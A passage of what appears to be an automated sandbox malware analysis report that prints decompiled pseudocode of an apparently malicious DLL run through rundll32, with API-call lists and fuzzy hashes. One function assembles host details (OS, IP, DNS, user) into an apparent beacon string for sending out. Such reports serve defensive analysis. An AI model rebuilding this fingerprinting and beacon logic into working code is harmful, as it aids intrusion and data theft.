                                          							_t23 = 0;
                                          						}
                                          						__imp__#6(_v12);
                                          					}
                                          				}
                                          				return _t23;
                                          			}











                                          APIs
                                            • Part of subcall function 0435642C: SysFreeString.OLEAUT32(?), ref: 0435650B
                                            • Part of subcall function 04354CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0435358E,004F0053,00000000,?), ref: 04354CDC
                                            • Part of subcall function 04354CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0435358E,004F0053,00000000,?), ref: 04354D06
                                            • Part of subcall function 04354CD3: memset.NTDLL ref: 04354D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04357C0C
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 14e595628955b8cf2c2ccdce2e774858b78fce0444e46356545fb3bdb34b6d0c
                                          • Instruction ID: 03f32d9e0d623184a4cff7bf78fd86e6d1829480684f978c99fc62df8ebffdab
                                          • Opcode Fuzzy Hash: 14e595628955b8cf2c2ccdce2e774858b78fce0444e46356545fb3bdb34b6d0c
                                          • Instruction Fuzzy Hash: A3019A3250051ABFDB02AFA8CC04EAABBB8EF48204F005421ED05E7070E371EA628B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E043558BE(long _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = RtlAllocateHeap( *0x435d238, 0, _a4); // executed
                                          				return _t2;
                                          			}





                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 80a50da1bf623821dacf45549defa0b3387cff2061f436a233aba983288c678f
                                          • Instruction ID: cfa935ba16348856bc4bd25210e9429a50a1397ad1151545426d7bd3575ede09
                                          • Opcode Fuzzy Hash: 80a50da1bf623821dacf45549defa0b3387cff2061f436a233aba983288c678f
                                          • Instruction Fuzzy Hash: 7DB01231000300EBDA014B00ED08F15BB6DEB58700F01E010B2001447083358C20EB16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E04359347(void* __ecx, signed char* _a4) {
                                          				void* _v8;
                                          				void* _t8;
                                          				signed short _t11;
                                          				signed int _t12;
                                          				signed int _t14;
                                          				intOrPtr _t15;
                                          				void* _t19;
                                          				signed short* _t22;
                                          				void* _t24;
                                          				intOrPtr* _t27;
                                          
                                          				_t24 = 0;
                                          				_push(0);
                                          				_t19 = 1;
                                          				_t27 = 0x435d330;
                                          				E0435684E();
                                          				while(1) {
                                          					_t8 = E043532BA(_a4,  &_v8); // executed
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_push(_v8);
                                          					_t14 = 0xd;
                                          					_t15 = E0435A5E9(_t14);
                                          					if(_t15 == 0) {
                                          						HeapFree( *0x435d238, 0, _v8);
                                          						break;
                                          					} else {
                                          						 *_t27 = _t15;
                                          						_t27 = _t27 + 4;
                                          						_t24 = _t24 + 1;
                                          						if(_t24 < 3) {
                                          							continue;
                                          						} else {
                                          						}
                                          					}
                                          					L7:
                                          					_push(1);
                                          					E0435684E();
                                          					if(_t19 != 0) {
                                          						_t22 =  *0x435d338; // 0x6879b58
                                          						_t11 =  *_t22 & 0x0000ffff;
                                          						if(_t11 < 0x61 || _t11 > 0x7a) {
                                          							_t12 = _t11 & 0x0000ffff;
                                          						} else {
                                          							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                          						}
                                          						 *_t22 = _t12;
                                          					}
                                          					return _t19;
                                          				}
                                          				_t19 = 0;
                                          				goto L7;
                                          			}














                                          APIs
                                            • Part of subcall function 0435684E: GetProcAddress.KERNEL32(36776F57,0435935F), ref: 04356869
                                            • Part of subcall function 043532BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 043532E5
                                            • Part of subcall function 043532BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04353307
                                            • Part of subcall function 043532BA: memset.NTDLL ref: 04353321
                                            • Part of subcall function 043532BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0435335F
                                            • Part of subcall function 043532BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04353373
                                            • Part of subcall function 043532BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 0435338A
                                            • Part of subcall function 043532BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04353396
                                            • Part of subcall function 043532BA: lstrcat.KERNEL32(?,642E2A5C), ref: 043533D7
                                            • Part of subcall function 043532BA: FindFirstFileA.KERNEL32(?,?), ref: 043533ED
                                            • Part of subcall function 0435A5E9: lstrlen.KERNEL32(?,00000000,0435D330,00000001,0435937A,0435D00C,0435D00C,00000000,00000005,00000000,00000000,?,?,?,0435207E,?), ref: 0435A5F2
                                            • Part of subcall function 0435A5E9: mbstowcs.NTDLL ref: 0435A619
                                            • Part of subcall function 0435A5E9: memset.NTDLL ref: 0435A62B
                                          • HeapFree.KERNEL32(00000000,0435D00C,0435D00C,0435D00C,00000000,00000005,00000000,00000000,?,?,?,0435207E,?,0435D00C,?,?), ref: 04359396
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: b57ecbbca46f6a1072395a3f6486262cf00fc809251a533fcebb06a661f751ab
                                          • Instruction ID: c71229166d383084e18f059897b8a3d42b514b93183953ab2e4ad32d9771ae60
                                          • Opcode Fuzzy Hash: b57ecbbca46f6a1072395a3f6486262cf00fc809251a533fcebb06a661f751ab
                                          • Instruction Fuzzy Hash: 8B01D2B5310205EAEB105EA6DD80F7E77ADEF44368F443035AD48C60B0D664AC819261
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04351B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				void* _t15;
                                          				void* _t21;
                                          				signed int _t23;
                                          				void* _t26;
                                          
                                          				if(_a4 != 0) {
                                          					_t15 = E04357BA9(_a4, _a8, _a12, __edi); // executed
                                          					_t26 = _t15;
                                          				} else {
                                          					_t26 = E043574B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                          					if(_t26 == 0) {
                                          						_t23 = _a8 >> 1;
                                          						if(_t23 == 0) {
                                          							_t26 = 2;
                                          							HeapFree( *0x435d238, 0, _a12);
                                          						} else {
                                          							_t21 = _a12;
                                          							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                          							 *__edi = _t21;
                                          						}
                                          					}
                                          				}
                                          				return _t26;
                                          			}








                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,0435690C,?,004F0053,06879388,00000000,?), ref: 04351B60
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: bd1936f0b89d96e85db3577a74f9134c959c0549e9048635b2b6afd716e4db1d
                                          • Instruction ID: 2337e603760cd2e3431168f8582d3dc42628aab65d68cfe04ffd221c5360ee91
                                          • Opcode Fuzzy Hash: bd1936f0b89d96e85db3577a74f9134c959c0549e9048635b2b6afd716e4db1d
                                          • Instruction Fuzzy Hash: 42016D32500609FBDF219F94DC05FAA3B69EF08360F089029FE199A270E730A920DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0435A872(intOrPtr* __edi) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _t15;
                                          				intOrPtr* _t21;
                                          
                                          				_t21 = __edi;
                                          				_push( &_v12);
                                          				_push(__edi);
                                          				_v8 = 0x1d4c0;
                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                          				while(1) {
                                          					_v16 = _t15;
                                          					Sleep(0x1f4); // executed
                                          					if(_v12 == 4) {
                                          						break;
                                          					}
                                          					if(_v8 == 0) {
                                          						L4:
                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                          						continue;
                                          					} else {
                                          						if(_v8 <= 0x1f4) {
                                          							_v16 = 0x80004004;
                                          						} else {
                                          							_v8 = _v8 - 0x1f4;
                                          							goto L4;
                                          						}
                                          					}
                                          					L8:
                                          					return _v16;
                                          				}
                                          				goto L8;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 431d9349aa7c3612daed380c60e21fd7a0b68fe27bacf9c9d10729a738b05772
                                          • Instruction ID: d25edbc386d677330325f96052623f3c7558bccef8525bd483cffdfe9e31228e
                                          • Opcode Fuzzy Hash: 431d9349aa7c3612daed380c60e21fd7a0b68fe27bacf9c9d10729a738b05772
                                          • Instruction Fuzzy Hash: DCF03C71D01218EFDB00EB94C488EEDBBB8EF04304F1491AAE902A7250D3B46B85DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E043560CF(void* __edx, void* __edi, void* _a4) {
                                          				int _t7;
                                          				int _t13;
                                          
                                          				_t7 = E04357A28(__edx, __edi, _a4,  &_a4); // executed
                                          				_t13 = _t7;
                                          				if(_t13 != 0) {
                                          					memcpy(__edi, _a4, _t13);
                                          					 *((char*)(__edi + _t13)) = 0;
                                          					E0435147E(_a4);
                                          				}
                                          				return _t13;
                                          			}

                                          APIs
                                            • Part of subcall function 04357A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 04357A5E
                                            • Part of subcall function 04357A28: memset.NTDLL ref: 04357AD3
                                            • Part of subcall function 04357A28: memset.NTDLL ref: 04357AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04359F9F,?,?,04359C62,00000002,?,?,?), ref: 043560EB
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: f53ed8d6048b1c8d649dd3d0b4839e92b0eabbebe0181ea8a9f570635608313b
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: 60E0C2B750012977DB222E94DC01EEFBF6CCF526E1F005020FE0C9A225DA31EA6093E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 66%
                                          			E0435514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                          				intOrPtr _v0;
                                          				intOrPtr _v4;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v48;
                                          				intOrPtr _v56;
                                          				void* __edi;
                                          				long _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t34;
                                          				intOrPtr _t35;
                                          				int _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t44;
                                          				intOrPtr _t51;
                                          				intOrPtr _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t71;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				int _t80;
                                          				intOrPtr _t81;
                                          				int _t84;
                                          				intOrPtr _t86;
                                          				int _t89;
                                          				intOrPtr* _t92;
                                          				intOrPtr* _t93;
                                          				void* _t94;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				intOrPtr _t101;
                                          				void* _t103;
                                          				int _t104;
                                          				void* _t105;
                                          				void* _t106;
                                          				void* _t108;
                                          				void* _t109;
                                          				void* _t111;
                                          
                                          				_t98 = __edx;
                                          				_t94 = __ecx;
                                          				_t26 = __eax;
                                          				_t108 = _a16;
                                          				_v4 = 8;
                                          				if(__eax == 0) {
                                          					_t26 = GetTickCount();
                                          				}
                                          				_t27 =  *0x435d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t28 =  *0x435d014; // 0x3a87c8cd
                                          				asm("bswap eax");
                                          				_t29 =  *0x435d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t30 =  *0x435d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t31 =  *0x435d2a4; // 0x251a5a8
                                          				_t3 = _t31 + 0x435e633; // 0x74666f73
                                          				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x435d02c,  *0x435d004, _t26);
                                          				_t34 = E043557AB();
                                          				_t35 =  *0x435d2a4; // 0x251a5a8
                                          				_t4 = _t35 + 0x435e673; // 0x74707526
                                          				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                          				_t111 = _t109 + 0x38;
                                          				_t105 = _t104 + _t38;
                                          				_t99 = E043573E9(_t94);
                                          				if(_t99 != 0) {
                                          					_t86 =  *0x435d2a4; // 0x251a5a8
                                          					_t6 = _t86 + 0x435e8cb; // 0x736e6426
                                          					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t89;
                                          					HeapFree( *0x435d238, 0, _t99);
                                          				}
                                          				_t100 = E0435614A();
                                          				if(_t100 != 0) {
                                          					_t81 =  *0x435d2a4; // 0x251a5a8
                                          					_t8 = _t81 + 0x435e8d3; // 0x6f687726
                                          					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t84;
                                          					HeapFree( *0x435d238, 0, _t100);
                                          				}
                                          				_t101 =  *0x435d324; // 0x68795b0
                                          				_a32 = E0435757B(0x435d00a, _t101 + 4);
                                          				_t43 =  *0x435d2cc; // 0x0
                                          				if(_t43 != 0) {
                                          					_t77 =  *0x435d2a4; // 0x251a5a8
                                          					_t11 = _t77 + 0x435e8ad; // 0x3d736f26
                                          					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t80;
                                          				}
                                          				_t44 =  *0x435d2c8; // 0x0
                                          				if(_t44 != 0) {
                                          					_t74 =  *0x435d2a4; // 0x251a5a8
                                          					_t13 = _t74 + 0x435e8a6; // 0x3d706926
                                          					wsprintfA(_t105 + _t108, _t13, _t44);
                                          				}
                                          				if(_a32 != 0) {
                                          					_t103 = RtlAllocateHeap( *0x435d238, 0, 0x800);
                                          					if(_t103 != 0) {
                                          						E0435749F(GetTickCount());
                                          						_t51 =  *0x435d324; // 0x68795b0
                                          						__imp__(_t51 + 0x40);
                                          						asm("lock xadd [eax], ecx");
                                          						_t55 =  *0x435d324; // 0x68795b0
                                          						__imp__(_t55 + 0x40);
                                          						_t57 =  *0x435d324; // 0x68795b0
                                          						_t106 = E04354D2C(1, _t98, _t108,  *_t57);
                                          						asm("lock xadd [eax], ecx");
                                          						if(_t106 != 0) {
                                          							StrTrimA(_t106, 0x435c294);
                                          							_t63 =  *0x435d2a4; // 0x251a5a8
                                          							_push(_t106);
                                          							_t15 = _t63 + 0x435e252; // 0x616d692f
                                          							_t65 = E04359DEF(_t15);
                                          							_v20 = _t65;
                                          							if(_t65 != 0) {
                                          								_t92 = __imp__;
                                          								 *_t92(_t106, _v4);
                                          								 *_t92(_t103, _v0);
                                          								_t93 = __imp__;
                                          								 *_t93(_t103, _v32);
                                          								 *_t93(_t103, _t106);
                                          								_t71 = E0435666E(0xffffffffffffffff, _t103, _v32, _v28);
                                          								_v56 = _t71;
                                          								if(_t71 != 0 && _t71 != 0x10d2) {
                                          									E04356106();
                                          								}
                                          								HeapFree( *0x435d238, 0, _v48);
                                          							}
                                          							HeapFree( *0x435d238, 0, _t106);
                                          						}
                                          						HeapFree( *0x435d238, 0, _t103);
                                          					}
                                          					HeapFree( *0x435d238, 0, _a24);
                                          				}
                                          				HeapFree( *0x435d238, 0, _t108);
                                          				return _a12;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04355166
                                          • wsprintfA.USER32 ref: 043551B3
                                          • wsprintfA.USER32 ref: 043551D0
                                          • wsprintfA.USER32 ref: 043551F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04355203
                                          • wsprintfA.USER32 ref: 04355225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04355235
                                          • wsprintfA.USER32 ref: 0435526C
                                          • wsprintfA.USER32 ref: 0435528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 043552A9
                                          • GetTickCount.KERNEL32 ref: 043552B9
                                          • RtlEnterCriticalSection.NTDLL(06879570), ref: 043552CD
                                          • RtlLeaveCriticalSection.NTDLL(06879570), ref: 043552EB
                                            • Part of subcall function 04354D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,043552FE,?,068795B0), ref: 04354D57
                                            • Part of subcall function 04354D2C: lstrlen.KERNEL32(?,?,?,043552FE,?,068795B0), ref: 04354D5F
                                            • Part of subcall function 04354D2C: strcpy.NTDLL ref: 04354D76
                                            • Part of subcall function 04354D2C: lstrcat.KERNEL32(00000000,?), ref: 04354D81
                                            • Part of subcall function 04354D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,043552FE,?,068795B0), ref: 04354D9E
                                          • StrTrimA.SHLWAPI(00000000,0435C294,?,068795B0), ref: 0435531D
                                            • Part of subcall function 04359DEF: lstrlen.KERNEL32(?,00000000,00000000,04355335,616D692F,00000000), ref: 04359DFB
                                            • Part of subcall function 04359DEF: lstrlen.KERNEL32(?), ref: 04359E03
                                            • Part of subcall function 04359DEF: lstrcpy.KERNEL32(00000000,?), ref: 04359E1A
                                            • Part of subcall function 04359DEF: lstrcat.KERNEL32(00000000,?), ref: 04359E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04355348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0435534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 0435535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04355360
                                            • Part of subcall function 0435666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04356720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04355390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 0435539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,068795B0), ref: 043553AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 043553C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 043553CF
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 905ad691f27a6713d50bf86e023c676f8b95fbb580828656de12ef8e1f40fead
                                          • Instruction ID: f97bcc8362e7856baa2b8d44b1557634d63279106df8b02ed9297969e970830f
                                          • Opcode Fuzzy Hash: 905ad691f27a6713d50bf86e023c676f8b95fbb580828656de12ef8e1f40fead
                                          • Instruction Fuzzy Hash: A7618A71500301AFE711ABA8EC88F6A7BECEF4C358F056114F909DB260DB29ED06DB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E0435ADA5(long _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				LONG* _v28;
                                          				long _v40;
                                          				long _v44;
                                          				long _v48;
                                          				CHAR* _v52;
                                          				long _v56;
                                          				CHAR* _v60;
                                          				long _v64;
                                          				signed int* _v68;
                                          				char _v72;
                                          				signed int _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t85;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t95;
                                          				intOrPtr* _t98;
                                          				void* _t102;
                                          				intOrPtr* _t104;
                                          				void* _t115;
                                          				long _t116;
                                          				void _t125;
                                          				void* _t131;
                                          				signed short _t133;
                                          				struct HINSTANCE__* _t138;
                                          				signed int* _t139;
                                          
                                          				_t139 = _a4;
                                          				_v28 = _t139[2] + 0x4350000;
                                          				_t115 = _t139[3] + 0x4350000;
                                          				_t131 = _t139[4] + 0x4350000;
                                          				_v8 = _t139[7];
                                          				_v60 = _t139[1] + 0x4350000;
                                          				_v16 = _t139[5] + 0x4350000;
                                          				_v64 = _a8;
                                          				_v72 = 0x24;
                                          				_v68 = _t139;
                                          				_v56 = 0;
                                          				asm("stosd");
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				if(( *_t139 & 0x00000001) == 0) {
                                          					_a8 =  &_v72;
                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                          					return 0;
                                          				}
                                          				_t138 =  *_v28;
                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                          				_t133 =  *(_t131 + _t76);
                                          				_a4 = _t76;
                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                          				_v56 = _t80;
                                          				_t81 = _t133 + 0x4350002;
                                          				if(_t80 == 0) {
                                          					_t81 = _t133 & 0x0000ffff;
                                          				}
                                          				_v52 = _t81;
                                          				_t82 =  *0x435d1a0; // 0x0
                                          				_t116 = 0;
                                          				if(_t82 == 0) {
                                          					L6:
                                          					if(_t138 != 0) {
                                          						L18:
                                          						_t83 =  *0x435d1a0; // 0x0
                                          						_v48 = _t138;
                                          						if(_t83 != 0) {
                                          							_t116 =  *_t83(2,  &_v72);
                                          						}
                                          						if(_t116 != 0) {
                                          							L32:
                                          							 *_a8 = _t116;
                                          							L33:
                                          							_t85 =  *0x435d1a0; // 0x0
                                          							if(_t85 != 0) {
                                          								_v40 = _v40 & 0x00000000;
                                          								_v48 = _t138;
                                          								_v44 = _t116;
                                          								 *_t85(5,  &_v72);
                                          							}
                                          							return _t116;
                                          						} else {
                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                          								L27:
                                          								_t116 = GetProcAddress(_t138, _v52);
                                          								if(_t116 == 0) {
                                          									_v40 = GetLastError();
                                          									_t90 =  *0x435d19c; // 0x0
                                          									if(_t90 != 0) {
                                          										_t116 =  *_t90(4,  &_v72);
                                          									}
                                          									if(_t116 == 0) {
                                          										_a4 =  &_v72;
                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                          										_t116 = _v44;
                                          									}
                                          								}
                                          								goto L32;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                          									_t116 =  *(_a4 + _v16);
                                          									if(_t116 != 0) {
                                          										goto L32;
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          						}
                                          					}
                                          					_t98 =  *0x435d1a0; // 0x0
                                          					if(_t98 == 0) {
                                          						L9:
                                          						_t138 = LoadLibraryA(_v60);
                                          						if(_t138 != 0) {
                                          							L13:
                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                          								FreeLibrary(_t138);
                                          							} else {
                                          								if(_t139[6] != 0) {
                                          									_t102 = LocalAlloc(0x40, 8);
                                          									if(_t102 != 0) {
                                          										 *(_t102 + 4) = _t139;
                                          										_t125 =  *0x435d198; // 0x0
                                          										 *_t102 = _t125;
                                          										 *0x435d198 = _t102;
                                          									}
                                          								}
                                          							}
                                          							goto L18;
                                          						}
                                          						_v40 = GetLastError();
                                          						_t104 =  *0x435d19c; // 0x0
                                          						if(_t104 == 0) {
                                          							L12:
                                          							_a8 =  &_v72;
                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                          							return _v44;
                                          						}
                                          						_t138 =  *_t104(3,  &_v72);
                                          						if(_t138 != 0) {
                                          							goto L13;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t138 =  *_t98(1,  &_v72);
                                          					if(_t138 != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				_t116 =  *_t82(0,  &_v72);
                                          				if(_t116 != 0) {
                                          					goto L33;
                                          				}
                                          				goto L6;
                                          			}


                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0435AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 0435AE9B
                                          • GetLastError.KERNEL32 ref: 0435AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0435AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          Uniqueness

                                          Uniqueness Score: -1.00%

